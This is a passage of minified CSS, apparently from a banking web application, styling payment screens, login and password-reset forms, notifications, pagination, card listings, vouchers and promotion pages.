16px;flex-direction:column}.payment-header>*{flex:auto}.payment-header__transaction{order:1;margin-top:16px}.payment-header.has-qrcode .payment-header__transaction{padding-right:0;padding-right:30%}.payment-header__bank-contact{order:2;margin-top:24px;text-align:left}.payment-header.has-qrcode .payment-header__bank-contact{padding-right:30%}.payment-header__qrcode{width:calc((100% - 40px) * 0.3);max-width:120px;bottom:24px;right:16px}.payment-header__qrcode canvas{width:100%}}.money-box{display:flex}.money-box__amount{flex-shrink:0}.money-box__translate{margin-left:16px;color:#C9D9EA}@media screen and (max-width: 1023px){.money-box{display:block}.money-box__translate{margin-left:0}}.pl-box-info .details{border-top:1px solid #005993}.pl-box-info .details ul{padding:0;margin:0}.pl-box-info .details li{margin-top:8px;display:flex;justify-content:space-between;font-size:14px;font-weight:400;line-height:20px}.pl-input-group__title{padding:32px 0 16px 0}.pl-input-group__row{display:flex;justify-content:start;align-items:baseline}.pl-input-group__row:not(:first-child){margin-top:24px}.pl-input-group__col:nth-child(1){flex:3}.pl-input-group__col:nth-child(2){flex:7;margin-left:16px}.pl-input-group__col__inside{max-width:512px}@media screen and (max-width: 1023px){.pl-input-group:not(:first-child){margin-top:16px}.pl-input-group__title{padding:16px 0}.pl-input-group__row{display:block}.pl-input-group__row:not(:first-child){margin-top:16px}.pl-input-group__col:nth-child(1){padding-top:0}.pl-input-group__col:nth-child(2){margin-left:0;margin-top:8px}.pl-input-group__col__inside{max-width:none}}.pl-text-group{font-size:16px;font-weight:400;line-height:24px}.pl-text-group__title{padding:32px 0 16px 0}@media screen and (max-width: 1023px){.pl-text-group__title{padding:32px 0 0 0}}.payment-row{display:flex;flex-direction:row;padding:16px 0}.payment-row.border{border-bottom:1px dashed #C9D9EA}@media screen and (max-width: 1023px){.payment-row{display:block;padding:16px 0 12px 0}}.payment-layout{padding:40px 64px 56px 60px;transition:padding .3s}.payment-layout__title{position:relative}.payment-layout__title .btn-back{display:inline-block;position:absolute;top:0;transform:translateY(-100%);left:0;cursor:pointer}.payment-layout__title .btn-back .icon-back{margin-top:-3px;width:16px}.payment-layout__content{margin-top:24px;background:#fff;-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.05);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.05);box-shadow:0px 8px 10px rgba(32,71,101,0.05);border-radius:10px;flex-grow:1}.payment-layout__step-mobile{display:none}.payment-layout__step-mobile:not(:empty){margin-top:16px}@media screen and (max-width: 1279px){.payment-layout{padding:40px 24px}}@media screen and (max-width: 1023px){.payment-layout{padding:24px 16px}.payment-layout__content{margin-top:16px}.payment-layout__step-mobile{display:block}}.promotion-hots-slide{position:relative;background-color:#E7EEF3;min-height:160px}@media screen and (max-width: 767px){.promotion-hots-slide{min-height:100px}}.promotion-hots-slide>*{position:absolute;top:0;left:0;width:100%}.promotion-hots-slide::before{content:'';display:block;padding-bottom:28.814%}.promotion-hots-slide__img{width:100%;height:100%;position:absolute;background-repeat:no-repeat;background-size:cover;background-position:center;top:0}.promotion-hots-slide .banner{width:100%;position:relative;background-size:cover;background-position:center;background-repeat:no-repeat;display:block !important;min-height:160px}@media screen and (max-width: 767px){.promotion-hots-slide .banner{min-height:100px}}.promotion-hots-slide .banner::before{content:'';display:block;padding-bottom:28.814%}.promotion-hots-slide .banner__content{width:100%;height:100%;position:absolute;top:0;left:0;color:white;background-size:cover;background-repeat:no-repeat;background-position:center}.promotion-hots-slide .banner__content .content-text{width:100%;height:100%;position:absolute;top:0;left:0;background:linear-gradient(180deg, rgba(0,0,0,0) 28.99%, rgba(0,0,0,0.1) 50%, rgba(0,0,0,0.6) 100%);padding:16px 48px;padding-bottom:24px;text-align:left;display:flex;flex-direction:column;justify-content:flex-end;align-items:flex-start}.promotion-hots-slide .banner__content .content-text .name,.promotion-hots-slide .banner__content .content-text .description{display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden;text-overflow:ellipsis;word-break:break-word}.promotion-hots-slide .banner__content .content-text .name{-webkit-line-clamp:1}@media screen and (max-width: 767px){.promotion-hots-slide .banner__content .content-text .name{font-size:16px}}.promotion-hots-slide .banner__content .content-text .description{-webkit-line-clamp:2}@media screen and (max-width: 767px){.promotion-hots-slide .banner__content .content-text .description{display:none}}@media screen and (max-width: 1023px){.promotion-hots-slide .banner__content .content-text{padding:16px}}.promotion-hots-slide .slick-dots{margin:0;bottom:16px;right:16px}@media screen and (max-width: 1023px){.promotion-hots-slide .slick-dots{bottom:8px}}.promotion-hots-slide .slick-dots li .vt-carousel__dot{background-color:#697F90}.promotion-hots-slide .slick-dots li.slick-active .vt-carousel__dot{background-color:#fff}.failed-fetch{height:100%;text-align:center;padding:8px;display:flex;justify-content:center;align-items:center}.failed-fetch img{max-height:120px;height:100%}.save-action-button{padding-left:0 !important;padding-right:0 !important;min-width:inherit}.save-action-button:not(:first-child){margin-left:32px}.save-action-wrap{display:flex;align-items:center}.save-action-wrap:empty{display:none}.snackbar-container{bottom:0;text-align:center;margin-top:60px;margin-left:0;transform:translateX(-50%);left:50%;width:400px;max-width:100vw;height:fit-content}.snackbar-container .snackbar-item{font-size:14px;font-weight:500;line-height:20px;border-radius:8px;padding:16px;min-height:48px;box-shadow:0px 0px 10px rgba(112,159,214,0.22);background-color:#fff;color:#062A46;display:flex;cursor:default}@media screen and (max-width: 767px){.snackbar-container .snackbar-item{margin:0 16px}}.snackbar-container .snackbar-item:not(:first-child){display:none}.snackbar-container .snackbar-item .snackbar-body{display:flex}.snackbar-container .snackbar-item .snackbar__content{font-size:14px;padding:0 16px;text-align:left;font-family:"SVN-Gilroy"}.snackbar-container .snackbar-item .snackbar__content.message-only .snackbar__message{line-height:23px}.snackbar-container .snackbar-item .snackbar__type{font-size:18px;font-weight:500;line-height:24px;margin-bottom:4px}.snackbar-container .snackbar-item.error .snackbar__type{color:#EA114E}.snackbar-container .snackbar-item.info .snackbar__type{color:#1A73AB}.snackbar-container .snackbar-item.warn .snackbar__type{color:#FF9B21}.snackbar-container .snackbar-item.success .snackbar__type{color:#4CB944}.snackbar-container .snackbar-item.offline .snackbar__message{color:#EA114E}.snackbar-container .snackbar-item.offline .Toastify__progress-bar{background:#EA114E}.snackbar-container .snackbar-item.online .snackbar__message{color:#4CB944}.snackbar-container .snackbar-item.online .Toastify__progress-bar{background:#4CB944}.snackbar-container .snackbar-item.online .snackbar__message,.snackbar-container .snackbar-item.offline .snackbar__message{line-height:23px}.snackbar-container .snackbar-item .snackbar__message{font-size:14px;font-weight:400;line-height:20px;color:#062A46}.snackbar-container .snackbar-item img{height:24px;width:24px}.snackbar-container .snackbar-item .Toastify__close-button{position:absolute;right:12px;top:16px;width:24px;height:24px}.snackbar-container .snackbar-item .Toastify__close-button::before,.snackbar-container .snackbar-item .Toastify__close-button::after{content:' ';position:absolute;top:50%;left:12px;transform:translateY(-50%) rotate(45deg);height:16px;width:1px;background-color:#9EB3C9}.snackbar-container .snackbar-item .Toastify__close-button::after{transform:translateY(-50%) rotate(-45deg)}.snackbar-container .snackbar-item .Toastify__progress-bar{height:3px}.snackbar-container .snackbar-item .Toastify__progress-bar--error{background:#EA114E}.snackbar-container .snackbar-item .Toastify__progress-bar--success{background:#4CB944}.snackbar-container .snackbar-item .Toastify__progress-bar--warning{background:#FF9B21}.snackbar-container .snackbar-item .Toastify__progress-bar--info{background:#1A73AB}.step-ui{display:flex;flex-direction:row;align-items:stretch}.step-ui .step-item{padding:0 24px;display:flex;flex-direction:column;align-items:center;border-bottom:1px solid #C9D9EA;cursor:pointer}@media screen and (max-width: 767px){.step-ui .step-item{padding:0 12px}}.step-ui .step-item.active{border-bottom-color:#4CB944}.step-ui .step-item.active .step-label{color:#062A46}.step-ui .step-item.active .step-count{background-color:#4CB944}.step-ui .step-item.failed{border-bottom-color:#EE2E63}.step-ui .step-item .step-label{font-size:16px;font-weight:500;line-height:22px;color:#9EB3C9;text-align:center;flex-grow:1}.step-ui .step-item .step-count{margin-top:8px;margin-bottom:-12px;z-index:1;width:24px;height:24px;display:flex;justify-content:center;align-items:center;border-radius:100%;background-color:#C9D9EA;overflow:hidden}.step-ui .step-item .step-count span{color:#fff}.step-ui .step-item .step-count img{width:24px}.step-ui .offset{flex:auto;border-bottom:1px solid #C9D9EA}.step-ui .offset.active{border-bottom-color:#4CB944}.step-ui .offset.failed{border-bottom-color:#EE2E63}.step-wrapper{display:flex;flex-direction:column}.step-wrapper .step{display:flex;align-items:center}.step-wrapper .step .step-label{margin-left:16px;color:#9EB3C9}.step-wrapper .step .step-count{position:relative;padding:20px 0}.step-wrapper .step .step-count .step-num{width:24px;height:24px;display:flex;justify-content:center;align-items:center;border-radius:50%;background:#E7EEF3;color:#9EB3C9;position:relative;padding-top:2px}.step-wrapper .step .step-count .step-count__line{background-color:#C9D9EA;mix-blend-mode:darken;width:3px;height:100%;position:absolute;top:0;left:50%;transform:translateX(-50%)}.step-wrapper .step:first-child .step-count .step-count__line{border-radius:20px 20px 0 0}.step-wrapper .step:nth-last-child(1) .step-count .step-count__line{border-radius:0 0 20px 20px}.step-wrapper .step .checked-img{width:24px;height:24px;position:relative}.step-wrapper .step.checked .step-label{color:#062A46}.step-wrapper .step.checked .step-count .step-num{background:#4CB944;color:#fff}.step-wrapper .step.checked .step-count .step-count__line{background-color:#4CB944}.step-wrapper .step.failed .step-label{color:#062A46}.step-wrapper .step.failed .step-count .step-count__line{background-color:#EE2E63}.step-wrapper.horizontal{flex-direction:row}.step-wrapper.horizontal .step{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-negative:0;flex-shrink:0;-ms-flex-preferred-size:0;flex-basis:0;display:block;position:relative}.step-wrapper.horizontal .step .step-count{padding:8px 0}.step-wrapper.horizontal .step .step-count .step-count__line{height:3px;width:100%;left:0;top:50%;transform:translateY(-50%)}.step-wrapper.horizontal .step .step-count .step-num{margin:auto}.step-wrapper.horizontal .step .step-label{text-align:center;margin:0;padding:0 8px}.step-wrapper.horizontal .step:first-child .step-count .step-count__line{border-radius:20px 0 0 20px}.step-wrapper.horizontal .step:nth-last-child(1) .step-count .step-count__line{border-radius:0 20px 20px 0}.step-wrapper.horizontal .step.checked .checked-img{margin:auto;display:block}.tab-nav{width:100%;display:flex;flex-direction:row;align-items:center;-webkit-box-shadow:inset 0 -1px 0 0 #9EB3C9;-moz-box-shadow:inset 0 -1px 0 0 #9EB3C9;box-shadow:inset 0 -1px 0 0 #9EB3C9;overflow-x:auto}.tab-nav.tab-disabled{pointer-events:none;cursor:default;filter:grayscale(1);opacity:0.4}.tab-nav.long-tab .tab-item{flex:inherit;padding:7px 24px}.tab-nav.wide-tab .tab-item{padding:16px 36px}.tab-nav .tab-item{flex-grow:1;flex-shrink:0;flex-basis:0;text-align:center;color:#9EB3C9;position:relative;cursor:pointer;padding:7px 4px;white-space:nowrap}.tab-nav .tab-item.active{color:#000;border-bottom-width:2px}.tab-nav .tab-item.active::before{content:' ';display:block;position:absolute;width:100%;height:2px;background-color:#EA114E;left:0;bottom:0}.tab-nav .tab-item::after{content:' ';position:absolute;height:12px;width:1px;background-color:#757575;right:0;top:50%;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%)}.tab-nav .tab-item:last-child::after{display:none}.tab-nav .tab-item .num-notify{position:absolute;width:15px;height:15px;border-radius:50%;background:#EA114E;top:-6px;right:8px;line-height:15px;text-align:center;font-size:10px;color:#fff}.vertical-tab{display:flex;flex-direction:column}.vertical-tab img{width:56px;height:56px;cursor:pointer}.vertical-tab img:not(:first-child){margin-top:16px}.table-pagination{display:flex;flex-direction:row;justify-content:space-between;align-items:center;margin-top:15px}.table-pagination-total{flex:0 0 auto;font-weight:400;font-size:14px;line-height:20px;color:#9EB3C9}.table-pagination-total-range,.table-pagination-total-total{font-weight:600;color:#062A46}.table-pagination-pages{flex:1 1 auto;display:flex;flex-direction:row;align-items:center}.table-pagination-pages-list>ul{display:flex;flex-wrap:wrap;align-items:baseline;justify-content:center;list-style-type:none;margin-bottom:0 !important;padding-inline-start:0px !important}.table-pagination-pages-list-selected{background:#005993;border-radius:50%}.table-pagination-pages-list-selected>a{color:#fff !important}.table-pagination-pages-list-number>a{color:#9EB3C9;font-style:normal;font-weight:500;font-size:14px;line-height:34px;width:32px;height:32px;text-align:center;vertical-align:middle;display:inline-block}.table-pagination-pages:hover{cursor:pointer}.table-pagination-select .is-open>.dropdown-control{border-radius:20px 20px 0px 0px !important;-moz-border-radius:20px 20px 0px 0px !important;-webkit-border-radius:20px 20px 0px 0px !important}.table-pagination-select .dropdown .arrow{width:20px;height:20px;margin-left:10px;object-fit:scale-down;padding-bottom:2px}.table-pagination-select .dropdown-control{border-radius:20px;-moz-border-radius:20px;-webkit-border-radius:20px;border:1px solid #005993;display:flex;flex-direction:row;justify-content:space-between;align-items:center;padding:8px 10px 8px 12px}.table-pagination-select .dropdown-placeholder{font-style:normal;font-weight:500;font-size:14px;line-height:18px;color:#005993}.table-pagination-select .dropdown-menu{border-radius:0px 0px 20px 20px;-moz-border-radius:0px 0px 20px 20px;-webkit-border-radius:0px 0px 20px 20px;text-align:center;font-style:normal;font-weight:500;font-size:14px;line-height:18px;color:#062A46;border:1px solid #005993;border-top:none}@media screen and (max-width: 1023px){.table-pagination{flex-wrap:wrap;justify-content:center;margin-top:32px}.table-pagination-total,.table-pagination-select{margin:4px}.table-pagination-pages-list{flex-basis:100%;order:-1;justify-content:center;margin-bottom:16px}}.tic{display:flex;align-items:center;width:fit-content}.tic .ic{position:relative;line-height:0}.tic .ic.ic-right{order:1}.tic .ic .ic-noti{position:absolute;top:-4px;right:calc(-16px + 8px);width:16px;height:16px;border-radius:50%;background:#EA114E;text-align:center;font-size:10px;font-weight:500;line-height:16px;color:#fff}.tooltip{opacity:0;transition:opacity .4s;visibility:hidden;z-index:9999;position:absolute;background-color:#fff;padding:8px 16px;border-radius:8px;border:1px solid #9EB3C9;font-size:12px;font-weight:normal;line-height:12px;color:#1A73AB;pointer-events:none;width:max-content;max-width:320px}.tooltip::after{content:"";position:absolute;width:8px;height:8px;border-top:1px solid #9EB3C9;border-left:1px solid #9EB3C9;background-color:#fff}*:hover>.tooltip{visibility:visible;opacity:1}.tooltip-bottom{left:50%;top:calc(100% + 12px);transform:translateX(-50%)}.tooltip-bottom::after{bottom:calc(100% - 3px);left:calc(50% - 3px);transform:rotate(45deg)}.tooltip-top{left:50%;bottom:calc(100% + 12px);transform:translateX(-50%)}.tooltip-top::after{top:calc(100% - 3px);left:calc(50% - 3px);transform:rotate(225deg)}.tooltip-right{top:50%;left:calc(100% + 12px);transform:translateY(-50%)}.tooltip-right::after{bottom:calc(50% - 3px);right:calc(100% - 3px);transform:rotate(315deg)}.tooltip-left{top:50%;right:calc(100% + 12px);transform:translateY(-50%)}.tooltip-left::after{bottom:calc(50% - 3px);left:calc(100% - 3px);transform:rotate(135deg)}.transfer-fail-wrapper{display:flex;flex-direction:column;justify-content:center;align-items:center;padding:100px 32px 40px 32px;background:#fff;border-radius:10px;box-shadow:0px 8px 10px rgba(32,71,101,0.02)}.transfer-fail-wrapper .content{margin-bottom:132px;display:flex;flex-direction:column;align-items:center}.transfer-fail-wrapper .content>img{margin-bottom:28px}.transfer-fail-wrapper .content>.heading-6,.transfer-fail-wrapper .content>.pl-input-group__title,.transfer-fail-wrapper .content>.pl-text-group__title,.transfer-fail-wrapper .toggle-status__content .content>.content__title,.toggle-status__content .transfer-fail-wrapper .content>.content__title,.transfer-fail-wrapper .content>.settlement-form__body__title,.transfer-fail-wrapper .content>.lucky-num__lst__title,.transfer-fail-wrapper .modal-schedule-bill-details .modal-container .head-info .content>.title,.modal-schedule-bill-details .modal-container .head-info .transfer-fail-wrapper .content>.title,.transfer-fail-wrapper .transfer .transfer-content .transfer-form .content>.title,.transfer .transfer-content .transfer-form .transfer-fail-wrapper .content>.title{margin-bottom:8px;color:#062A46}.transfer-fail-wrapper .content>.paragraph-3{max-width:450px;text-align:center;color:#9EB3C9}.transfer-fail-wrapper hr{height:1px;color:#C9D9EA;background-color:#C9D9EA;width:100%;border:none;margin-bottom:32px}.transfer-fail-wrapper .footer{width:100%;display:flex;flex-direction:row;justify-content:flex-end;align-items:center}.forgot-password .forgot-form .heading{margin-bottom:32px}.forgot-password .forgot-form form .form-input{margin-bottom:24px}.forgot-password .forgot-form .form-function{margin-top:32px}.forgot-password .forgot-form .btn-continue{width:100%}.forgot-username .select-number-type{padding:8px 0;border-bottom:1px solid #9EB3C9}.forgot-username__dropdown-list{max-height:320px;overflow-y:auto}.wrap-layout{position:fixed;top:0%;bottom:0;left:0;right:0;overflow:auto;background-size:cover;background-repeat:no-repeat}.wrap-layout .auth-layout{display:flex;flex-direction:column;width:100%;height:100%;max-width:1920px;margin:auto;padding:32px 64px}.wrap-layout .auth-layout .btn-full-width{width:100%}.wrap-layout .auth-layout .select-lang{margin-top:-4px}.wrap-layout .auth-layout-header{flex:0 1 auto}.wrap-layout .auth-layout-header-img{overflow:hidden;line-height:0;flex-grow:1}.wrap-layout .auth-layout-header-img .logo{max-width:240px;max-height:48px;min-height:24px}.wrap-layout .auth-layout-header-hotline{color:#fff}.wrap-layout .auth-layout-header__end{display:flex;align-items:center;flex-wrap:nowrap;margin-left:auto}.wrap-layout .auth-layout-content{padding:24px 0}.wrap-layout .auth-layout-content-quote>span{font-style:italic;font-weight:500;font-size:24px;color:#fff;vertical-align:text-top}.wrap-layout .auth-layout-content-form{max-width:360px;width:100%;padding:72px 40px 32px 40px;border-radius:10px;background-size:cover;background-image:linear-gradient(white, white, rgba(255,255,255,0.7))}.wrap-layout .auth-layout-footer{flex:0 1 auto;color:#fff}.wrap-layout .auth-layout-footer .footer-menu{display:flex;flex-direction:row;justify-content:space-between;opacity:0.8}.wrap-layout .auth-layout-footer .footer-menu-item:not(:first-child){margin-left:40px}.wrap-layout .auth-layout-footer .footer-menu-item>a{color:inherit}.wrap-layout .auth-layout-footer .footer-menu-item .download-icon{margin-left:8px}.wrap-layout .auth-layout-footer .footer-menu-item .download-icon img{width:18px;height:18px;cursor:pointer;vertical-align:sub}.wrap-layout .auth-layout-footer .footer-menu-item .download-icon img:not(:nth-last-child(1)){margin-right:8px}.wrap-layout .auth-layout-footer .bg-license{flex-basis:100%}.wrap-layout .auth-layout-footer .footer-license{opacity:.8}@media screen and (max-width: 1023px){.wrap-layout .auth-layout{padding:16px;padding-bottom:40px;padding-top:0}.wrap-layout .auth-layout-header>*{margin-top:16px}.wrap-layout .auth-layout-content{justify-content:center}.wrap-layout .auth-layout-content-quote{display:none}.wrap-layout .auth-layout-content-form{padding:56px 24px}.wrap-layout .auth-layout-footer .footer-menu{order:0;flex-direction:column-reverse}.wrap-layout .auth-layout-footer .footer-menu-item{margin-left:0 !important}.wrap-layout .auth-layout-footer .footer-menu-item.download-app{align-items:flex-start;flex-direction:column}.wrap-layout .auth-layout-footer .footer-menu-item.download-app .download-icon{margin:4px 0 16px 0}.wrap-layout .auth-layout-footer .footer-menu-item.download-app .download-icon img{width:44px;height:44px}.wrap-layout .auth-layout-footer .footer-menu-item.download-app .download-icon img:not(:nth-last-child(1)){margin-right:16px}.wrap-layout .auth-layout-footer .bg-license{order:1;margin-top:16px}.wrap-layout .auth-layout-footer .footer-license{order:2;margin-top:8px}}.login img.greeting{padding-left:8px;padding-bottom:10px}.login .title,.login .form-input{margin-bottom:30px}.login .title .input-username input,.login .form-input .input-username input{width:calc(100% + 40px);padding-right:40px}.login .title .input-password input,.login .form-input .input-password input{width:calc(100% + 40px);padding-right:70px !important}.login .title__resetBtn,.login .form-input__resetBtn{cursor:pointer;margin-left:8px}.login .form-input-captcha{margin-bottom:4px}.login .form-footer{margin-top:72px;display:flex;flex-direction:row}.login .form-footer .forget{padding-right:44px;display:flex;flex-wrap:wrap}.login .form-footer .forget span{margin:0 4px}.login .form-footer a{color:#000000}.login .form-footer .register{flex-shrink:0}@media screen and (max-width: 1023px){.login .form-input:nth-of-type(1){margin-top:24px}.login .title .input-username input,.login .form-input .input-username input{width:calc(100% + 24px);padding-right:24px}.login .form-footer{margin-top:32px;display:flex;align-items:center;justify-content:space-between}}.timeout-modal,.old-password-modal{max-width:480px !important;text-align:center}.timeout-modal .modal-content,.old-password-modal .modal-content{padding:32px}@media screen and (max-width: 1023px){.timeout-modal .modal-content,.old-password-modal .modal-content{padding:32px 16px}}.timeout-modal img,.old-password-modal img{max-width:240px;pointer-events:none}@media screen and (max-width: 1023px){.timeout-modal img,.old-password-modal img{max-width:200px}}.timeout-modal__actions>*:not(:first-child),.old-password-modal__actions>*:not(:first-child){margin-left:16px}.register-ipay .select-fee-account{padding:8px 0;border-bottom:1px solid #9EB3C9}.register-ipay .text-right{text-align:right}.update-password .title,.update-password .form-input{margin-bottom:30px}.update-password .custom-checkbox img{height:20px;margin-right:4px}.bank-locations__search{flex:3;min-width:400px;height:640px;overflow:auto;display:flex;flex-direction:column}.bank-locations__search .search__filter{display:flex}.bank-locations__search .search__filter>*{align-items:center}.bank-locations__search .search__filter>*:not(:first-child){margin-left:32px}.bank-locations__search .search_result{flex:1;overflow:auto}.bank-locations__search .search_result>*{border-top:1px solid #C9D9EA}.bank-locations__map{flex:7}.bank-locations__map iframe{width:100%;height:640px;display:block}.bank-locations .marker-location{padding:16px;background-color:white;border-radius:8px;max-width:240px;-webkit-box-shadow:0px 8px 15px rgba(124,158,177,0.1);-moz-box-shadow:0px 8px 15px rgba(124,158,177,0.1);box-shadow:0px 8px 15px rgba(124,158,177,0.1);position:relative;z-index:99}.bank-locations .marker-location .btn-close{position:absolute;top:16px;right:16px;cursor:pointer}.bank-locations .marker-location__arrow{position:absolute;top:-3px;left:calc(50% - 3px);width:6px;height:6px;transform:rotateZ(45deg);z-index:1;background-color:white}.buy-bond-history{padding:32px;display:flex;flex-flow:column}@media screen and (max-width: 1023px){.buy-bond-history{padding:32px 16px}}.buy-bond-history__action{display:flex;align-items:center}.buy-bond-history__action>*{text-align:left}@media screen and (max-width: 1023px){.buy-bond-history__action{flex-basis:100%;flex-wrap:wrap;justify-content:flex-start}}@media screen and (max-width: 1023px){.buy-bond-history__table{display:none}}@media screen and (min-width: 1024px){.buy-bond-history__sort{display:none}}.buy-bond-history__modal-transaction .modal-transaction-main,.buy-bond-history__modal-list .modal-transaction-main{background-image:url("/static/image/logo/logonotext-transparent.png");background-repeat:no-repeat;background-size:contain;background-color:#F4F8FB;background-position:center;background-size:300px;padding:0px 32px}.buy-bond-history__modal-transaction .modal-transaction-note,.buy-bond-history__modal-list .modal-transaction-note{display:block;font-size:12px;line-height:20px;padding:16px 0px;color:#9EB3C9}.buy-bond-history__modal-transaction .modal-transaction-title,.buy-bond-history__modal-list .modal-transaction-title{position:relative;padding:0px 32px}.buy-bond-history__modal-transaction .modal-transaction-title--label,.buy-bond-history__modal-list .modal-transaction-title--label{font-size:18px;line-height:24px;margin-bottom:8px;color:#4CB944;font-weight:500}.buy-bond-history__modal-transaction .modal-transaction-title--date,.buy-bond-history__modal-list .modal-transaction-title--date{font-size:14px;line-height:20px;margin-bottom:16px;color:#062A46}.buy-bond-history__modal-transaction .container-qr,.buy-bond-history__modal-list .container-qr{width:120px;height:120px;position:absolute;top:0;right:0}.buy-bond-history__modal-list{width:930px}.buy-bond-history__modal-list .modal-transaction-note{display:block;font-size:12px;line-height:20px;padding:16px 46px 32px 46px;color:#9EB3C9}.buy-bond-history__amount{text-align:right}.card-info{padding:32px}@media screen and (max-width: 1279px){.card-info{padding:24px}}@media screen and (max-width: 1023px){.card-info{padding:16px}}.card-info__description{white-space:pre-wrap}.card-info__list{margin:-16px;display:flex;flex-wrap:wrap}.card-info__item{margin:16px;flex-basis:calc(25% - 32px);min-width:192px;flex-grow:1;cursor:pointer}.card-info__item .banner-skeleton{position:absolute;top:0;left:0}.card-info__item .item-banner{background-color:#F4F8FB;width:100%;padding-top:62%;border-radius:4px;position:relative}.card-info__item .item-banner img{width:100%;height:100%;object-fit:cover;position:absolute;top:0;left:0;border-radius:10px}.card-info__details .wrap-card-img{max-width:392px;width:100%}.card-info__details .wrap-card-img .img-box{width:100%;padding-top:62%;background-color:#F4F8FB;position:relative}.card-info__details .wrap-card-img .img-box img{width:100%;height:100%;object-fit:cover;position:absolute;top:0;left:0;border-radius:10px}.card-info__details__benefit{padding-bottom:16px;margin-bottom:16px;border-bottom:1px solid #9EB3C9}.wrap-card-slide{position:relative}.wrap-card-slide .cover-slide{position:absolute;top:0;height:100%;width:25%;pointer-events:none;z-index:1}.wrap-card-slide .cover-slide.left{left:0;background:linear-gradient(90deg, #F4F8FB .08%, rgba(244,248,251,0) 73.96%)}.wrap-card-slide .cover-slide.right{right:0;background:linear-gradient(275.04deg, #F4F8FB .91%, rgba(244,248,251,0) 60.04%)}.card-list .card-slide .slick-slide{position:relative;transform:translateX(-24px)}.card-list .card-slide .slick-slide .card-item{display:block !important}.card-list .card-slide .slick-slide .card-item__content{width:208px;height:128px;margin:11px 8px;-webkit-transition:transform 0.3s;-moz-transition:transform 0.3s;-o-transition:transform 0.3s;transition:transform 0.3s;position:relative}.card-list .card-slide .slick-slide .card-item__content .img-card{background-size:cover;background-position:center;background-repeat:no-repeat;background-color:#adadad;border-radius:10px;cursor:pointer;display:block;position:absolute;width:100%;height:100%;top:50%;left:50%;transform:translate(-50%, -50%);-webkit-transition:width 0.3s,height 0.3s;-moz-transition:width 0.3s,height 0.3s;-o-transition:width 0.3s,height 0.3s;transition:width 0.3s,height 0.3s}.card-list .card-slide .slick-slide .card-item__name{text-align:center;opacity:0;-webkit-transition:opacity 0.3s;-moz-transition:opacity 0.3s;-o-transition:opacity 0.3s;transition:opacity 0.3s}.card-list .card-slide .slick-current ~ .slick-slide{transform:translateX(24px)}.card-list .card-slide .slick-current{transform:translateX(0)}.card-list .card-slide .slick-current .card-item__content .img-card{height:150px;width:240px}.card-list .card-slide .slick-current .card-item__name{opacity:1}.card-list .card-slide .slick-dots{justify-content:center}.voucher-item{background:#FFFFFF;border-radius:8px;border:1px solid #E7EEF3;display:block}.voucher-item__favorited{padding:4px;border-radius:4px;position:absolute;top:8px;right:8px;background-color:white}.voucher-item__favorited img{width:16px;display:block}.voucher-item__banner{position:relative;padding-top:62%;overflow:hidden;border-radius:8px 8px 0 0;background-color:#F4F8FB;background-size:cover;background-repeat:no-repeat;background-position:center}.voucher-item__banner .tag-new{background-color:#FFD12E;color:#B8711B;position:absolute;top:0;left:0;transform-origin:top center;transform:translateX(-50%) rotateZ(-45deg);padding:24px 8px 4px;width:120px;text-align:center;text-transform:uppercase}.voucher-item__banner .tag-location{position:absolute;bottom:8px;left:8px;padding:4px;border-radius:4px;background-color:rgba(6,42,70,0.5);color:white}.voucher-item__content .content-name{display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden;height:48px;color:#062A46}.voucher-item__content .discount{display:flex;align-items:center}.voucher-item__content .discount__value{color:#EA114E}.voucher-item__content .discount__separate{content:'';display:block;height:12px;width:1px;background-color:#C9D9EA;margin:0 16px}.promotion-details{overflow:hidden}.promotion-details .banner-slide{position:relative;background-color:#E7EEF3;min-height:160px}@media screen and (max-width: 767px){.promotion-details .banner-slide{min-height:100px}}.promotion-details .banner-slide>*{position:absolute;top:0;left:0;width:100%}.promotion-details .banner-slide::before{content:'';display:block;padding-bottom:28.814%}.promotion-details .banner-slide__img{width:100%;height:100%;position:absolute;background-repeat:no-repeat;background-size:cover;background-position:center;top:0}.promotion-details .banner-slide .banner{width:100%;position:relative;background-size:cover;background-position:center;background-repeat:no-repeat;display:block !important;min-height:160px}@media screen and (max-width: 767px){.promotion-details .banner-slide .banner{min-height:100px}}.promotion-details .banner-slide .banner::before{content:'';display:block;padding-bottom:28.814%}.promotion-details .banner-slide .banner__content{width:100%;height:100%;position:absolute;top:0;left:0;color:white;background-size:cover;background-repeat:no-repeat;background-position:center}.promotion-details__conditional a{color:#005993 !important;text-decoration:underline !important}.promotion-details__conditional b{font-weight:600 !important}.promotion-details__conditional p{margin:0}.promotion-details .promotion-deal>*:not(:first-child){margin-left:16px}.promotion-details .tag-list{display:flex;align-items:center}.promotion-details .tag-list.mobile{display:none}@media screen and (max-width: 1023px){.promotion-details .tag-list.mobile{display:flex;flex-wrap:wrap;margin:-8px}.promotion-details .tag-list.mobile .tag{white-space:nowrap;margin:4px !important}.promotion-details .tag-list.desk:not(:first-child){display:none}}.promotion-details .tag-list .tag{padding:4px 8px;border-radius:4px;border:1px solid #9EB3C9}.promotion-details .tag-list .tag:not(:first-child){margin-left:8px}.promotion-details .tag-list .tag:nth-child(1){border-color:#FD9F9D}.promotion-details .tag-list .tag:nth-child(2){border-color:#FFD48A}.promotion-details .favorited{padding:4px 10px;border-radius:8px;border:1px solid #E3EEF5;white-space:nowrap}@media screen and (max-width: 1023px){.promotion-details .favorited span{display:none}}.promotion-details__content{padding:32px}.promotion-details__content .promotion-percent{color:#EA114E}.promotion-details__content .card-apply .card-item{width:200px}.promotion-details__content .card-apply .card-list .slick-slide:not(:first-child){margin-left:24px}.promotion-details__content .card-apply .card-list .slick-arrow{margin-top:-14px}.promotion-details__content .card-apply .card-list .card-img{padding-top:0;height:124px;object-fit:cover}.promotion-details__content .apply-location .toggle-arrow{width:16px;height:16px;margin-left:4px;-webkit-transition:transform 0.3s;-moz-transition:transform 0.3s;-o-transition:transform 0.3s;transition:transform 0.3s}.promotion-details__content .apply-location.open .toggle-arrow{transform:rotateZ(90deg)}@media screen and (max-width: 1023px){.promotion-details__content{padding:16px}}.click-able{color:#005993 !important;text-decoration:underline !important}.modal-merchant-list{padding:24px;max-width:480px;margin:auto}.modal-merchant-list .btn-close{display:block;margin-left:auto;cursor:pointer;width:18px}.modal-merchant-list 